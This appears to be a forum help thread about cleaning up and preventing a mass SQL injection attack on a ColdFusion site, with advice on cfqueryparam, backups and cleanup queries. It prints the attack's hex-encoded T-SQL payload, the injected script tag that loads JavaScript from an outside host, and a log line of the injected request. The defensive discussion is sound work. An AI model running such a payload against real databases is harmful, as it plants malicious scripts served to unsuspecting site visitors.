SQL Injection Attack - Need help please!
cadkins asked:
Hi,
We are experiencing a really bad SQL Injection attack on our webserver (we are using ColdFusion). It has added the following code to many of our fields:
<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>
Can someone guide me step by step on how to get rid of this code and also make sure it doesn't happen again in the future?
This is really urgent!
Thanks :)
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C41524520 4054207661 7263686172 2832353529 2C40432076 6172636861 7228343030 3029204445 434C415245 205461626C 655F437572 736F722043 5552534F52 20464F5220 73656C6563 7420612E6E 616D652C62 2E6E616D65 2066726F6D 207379736F 626A656374 7320612C73 7973636F6C 756D6E7320 6220776865 726520612E 69643D622E 696420616E 6420612E78 747970653D 2775272061 6E64202862 2E78747970 653D393920 6F7220622E 7874797065 3D3335206F 7220622E78 747970653D 323331206F 7220622E78 747970653D 3136372920 4F50454E20 5461626C65 5F43757273 6F72204645 544348204E 4558542046 524F4D2020 5461626C65 5F43757273 6F7220494E 544F204054 2C40432057 48494C4528 4040464554 43485F5354 415455533D 3029204245 47494E2065 7865632827 7570646174 65205B272B 40542B275D 2073657420 5B272B4043 2B275D3D5B 272B40432B 275D2B2727 223E3C2F74 69746C653E 3C73637269 7074207372 633D226874 74703A2F2F 73646F2E31 3030306D67 2E636E2F63 737273732F 772E6A7322 3E3C2F7363 726970743E 3C212D2D27 2720776865 726520272B 40432B2720 6E6F74206C 696B652027 2725223E3C 2F7469746C 653E3C7363 7269707420 7372633D22 687474703A 2F2F73646F 2E31303030 6D672E636E 2F63737273 732F772E6A 73223E3C2F 7363726970 743E3C212D 2D27272729 4645544348 204E455854 2046524F4D 2020546162 6C655F4375 72736F7220 494E544F20 40542C4043 20454E4420 434C4F5345 205461626C 655F437572 736F722044 45414C4C4F 4341544520 5461626C65 5F43757273 6F72 AS varchar(4000) )
select @s
ASKER
Can you be little bit more specific please? :)
ASKER CERTIFIED SOLUTION
xtype values targeted by the payload:
99 - ntext
35 - text
231 - nvarchar
167 - varchar
ASKER
Well, I understand that it's selecting the table names and the column names from my database, but how can I make this stop?
Thanks
SOLUTION
ASKER
No, I'm not using cfqueryparam...
Here are some examples of queries we are using:
<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
select * from employmentApplication
where employmentApplicationID = #url.employmentApplicationID#
</cfquery>
<cfquery name="updateStatus" datasource= "#Request.DataSource#">
UPDATE employmentApplication SET
status = 'Viewed'
WHERE employmentApplicationID = #url.employmentApplicationID#
</cfquery>
<!---get the --->
<cfquery name="getQuestions" datasource="#Request.DataSource#">
select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
from empApplQuestion a, empApplicationQuestions b
where employmentApplicationID = #url.employmentApplicationID#
and a.empApplQuestionID = b.empApplQuestionID
</cfquery>
In every one of your queries, add cfqueryparam,
i.e.:
<cfqueryparam cfsqltype="cf_sql_varchar" value="#form.stringvalue#">
You can add htmleditformat for added protection:
<cfqueryparam cfsqltype="cf_sql_varchar" value="#htmleditformat(form.stringvalue)#">
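Added example (not part of the original thread, and not code from any of the posters): the asker's three queries from above, rewritten with cfqueryparam. Table and column names are the asker's; cf_sql_integer is an assumption because employmentApplicationID looks like a numeric key, and the cfparam line is an extra check I added, not something the thread mentions.

```cfml
<!--- Added example: the three vulnerable queries with every request value bound
      through cfqueryparam. The value is sent to the driver as a typed parameter,
      so a string such as 6';DECLARE @S... is rejected as "not an integer"
      instead of being appended to the SQL text. --->

<!--- Assumed extra check: fail early if the URL value is not an integer at all. --->
<cfparam name="url.employmentApplicationID" type="integer">

<cfquery name="getEmpAppl" datasource="#Request.DataSource#">
    select * from employmentApplication
    where employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
</cfquery>

<!--- 'Viewed' never comes from the request, so it could stay inline; binding it
      anyway costs nothing and keeps the statement fully parameterised. --->
<cfquery name="updateStatus" datasource="#Request.DataSource#">
    UPDATE employmentApplication
    SET status = <cfqueryparam cfsqltype="cf_sql_varchar" value="Viewed">
    WHERE employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
</cfquery>

<cfquery name="getQuestions" datasource="#Request.DataSource#">
    select a.employmentApplicationID, a.empApplQuestionID, a.Answer, b.questionText
    from empApplQuestion a, empApplicationQuestions b
    where employmentApplicationID = <cfqueryparam cfsqltype="cf_sql_integer"
                                                  value="#url.employmentApplicationID#">
      and a.empApplQuestionID = b.empApplQuestionID
</cfquery>
```

The rule of thumb for the conversion: every #...# that appears inside the SQL text and carries a value (url, form, cgi, cookie, or anything derived from them) becomes `<cfqueryparam cfsqltype="..." value="#...#">`; the datasource attribute and the SQL keywords stay as they are.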
ASKER
So how would I re-write the 3 queries that I showed you on the example above to include cfqueryparam?
I'm confused on what exactly should I replace with what...
Thanks
**CFQUERYPARAM is your best weapon against SQL injections.**
You should absolutely, without any doubt, add it to ALL your queries as soon as possible.
You will also gain a performance boost (a slight one, but over many requests it does make a difference).
Instead of using dynamic SQL, use SPs; that's the best approach.
ASKER
I think I wanna stick with SQL, but I'm still not sure how to use cfqueryparam...
SOLUTION
"Is it me or are there many such reports today???"
The last 2 days actually... there are lots of reports of this... and not just CFM sites.
http://isc.sans.org/diary.html
ASKER
Cool that helps :)
So once I add cfqueryparam to all the queries, will that get rid of all the scripts that have been added to many of the fields of my database? (I'm talking about <script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>)
Thanks
SOLUTION
ASKER
I'm assuming that if I have a clean backup of the database (before the attack) and I restore it, that could work too, right?
That would be the easiest for sure.
I'd do a backup of the compromised DB for forensics before you restore from the old one.
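Added example (not part of the original thread): what the cleanup looks like when there is no clean backup to restore. The first query uses the xtype values explained earlier in the thread to list every text-type column, since the payload updates all of them; the second strips the tag from one assumed column. Table and column names below are assumptions, and it only makes sense to run this after the queries have been fixed, otherwise the same rows are rewritten on the next request.

```cfml
<!--- Added example: locate and remove the injected tag. Assumes SQL Server
      (sysobjects/syscolumns) and the table/column names used in the thread. --->

<!--- The payload loops over every user table and every column whose xtype is
      99 (ntext), 35 (text), 231 (nvarchar) or 167 (varchar), so those are the
      columns that need to be checked. --->
<cfquery name="textColumns" datasource="#Request.DataSource#">
    select o.name as tableName, c.name as columnName, c.xtype
    from sysobjects o, syscolumns c
    where o.id = c.id
      and o.xtype = 'U'
      and c.xtype in (99, 35, 231, 167)
    order by o.name, c.name
</cfquery>

<!--- The exact string the asker reported. Kept in one variable so that the
      count and the update look for the same thing. --->
<cfset injectedTag = '<script src="http://jjmaobuduo.3322.org/csrss/w.js"></script>'>

<!--- Count first, so the update can be verified afterwards (the same count
      should return 0 once the cleanup has run). --->
<cfquery name="countHits" datasource="#Request.DataSource#">
    select count(*) as hits
    from employmentApplication
    where status like <cfqueryparam cfsqltype="cf_sql_varchar" value="%#injectedTag#%">
</cfquery>

<!--- One cleanup statement per (table, column) pair from textColumns. REPLACE
      works directly on varchar/nvarchar; text/ntext columns must be cast to
      varchar(max)/nvarchar(max) first on SQL Server 2005 and later. --->
<cfquery name="stripTag" datasource="#Request.DataSource#">
    update employmentApplication
    set status = replace(status,
                         <cfqueryparam cfsqltype="cf_sql_varchar" value="#injectedTag#">,
                         '')
    where status like <cfqueryparam cfsqltype="cf_sql_varchar" value="%#injectedTag#%">
</cfquery>

<cfoutput>Rows that contained the tag before cleanup: #countHits.hits#</cfoutput>
```

Take the forensic copy of the database before running the update, as suggested above; the affected-row count and the list from textColumns are also worth keeping, because they tell you which pages rendered the injected script to visitors.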
ASKER
OK, I will try that and I will let you know, sometime probably Monday, if it worked.
Thanks!
ASKER
I'm working on changing all the queries (there are 100s of them).
If I leave the old queries in my code as a comment (using <!--- and --->), would that be a problem? I just want to make sure that if I do something wrong I can always refer back to the old queries.
So basically I'm just wondering if code in a comment can be vulnerable to a SQL injection attack.
Thanks
"if code in a comment can be vulnerable to a SQL injection attack."
No... it's a good idea actually... although I'd go back once you've verified all is working as expected and remove them at some later date... makes the code easier to read later on.
CF code comments are simply removed by the parser before any processing is done.
ASKER
Thanks!
One more question. If a query has no "where" clause do I need to change anything?
For example:
<cfquery name="qryGetDataNew" datasource="#Request.DataSource#">
select * from Incidents
order by recordNo
</cfquery>
SOLUTION
("where 1 = <cfqueryparam cfsqltype="cf_sql_integer" value="1"/>."
Didn't know that, yama... thx for the link.)
SidFishes, Check out all the other performance articles on that site. There's a good deal of stuff there.
SOLUTION
For everyone's information:
there's an additional vuln possible if you are using ORDER BY:
http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by#more
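Added example (not part of the original thread): the asker's qryGetDataNew query, covering the two points raised just above. It uses the "where 1 = cfqueryparam" trick from earlier in the thread for a query that has no WHERE clause, and shows the safe pattern for a user-chosen ORDER BY column, which cfqueryparam cannot protect because a bound parameter is a value, not a column name. The url.sort parameter and the allowed column list (apart from recordNo) are assumptions.

```cfml
<!--- Added example: safe sorting for a query without a WHERE clause.
      Assumes a url.sort parameter; recordNo is the asker's column, the
      other names in the allowed list are made up for the example. --->
<cfparam name="url.sort" default="recordNo">

<!--- The column name must be chosen from a fixed list. listFindNoCase returns
      0 when the requested name is not in the list, in which case the default
      is used. --->
<cfset allowedSortColumns = "recordNo,incidentDate,reportedBy">
<cfset sortIndex = listFindNoCase(allowedSortColumns, url.sort)>
<cfif sortIndex eq 0>
    <cfset sortIndex = 1>
</cfif>

<!--- The identifier written into the SQL is taken from the allowed list by
      position (listGetAt), never from the request string itself, so nothing
      the user typed reaches the statement text. --->
<cfset sortColumn = listGetAt(allowedSortColumns, sortIndex)>

<!--- "where 1 = <cfqueryparam>" has no effect on the result set; it only makes
      the statement a prepared statement so the database can cache its plan. --->
<cfquery name="qryGetDataNew" datasource="#Request.DataSource#">
    select * from Incidents
    where 1 = <cfqueryparam cfsqltype="cf_sql_integer" value="1">
    order by #sortColumn#
</cfquery>
```

The same pattern applies to anything else that ends up in the SQL as an identifier or keyword (table names, ASC/DESC, column lists): map the request value onto a fixed set of known-good strings and emit the known-good string, not the input.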
ASKER
I finally modified all of the queries and now I'm testing to see if everything went well.
Most of them so far are OK, but in addition to our SQL database we are also using an Access database for a small part of our website. I get an error on the page where we use the Access database.
Does cfqueryparam work for Access?
SOLUTION
ASKER
2008-08-08 00:13:06 192.168.80.10 GET /ah/ah_locations.cfm locationID=6';DECLARE%20@S
I deleted the ah_locations.cfm page yesterday just to see if that would help, but it still finds it somehow...
HELP!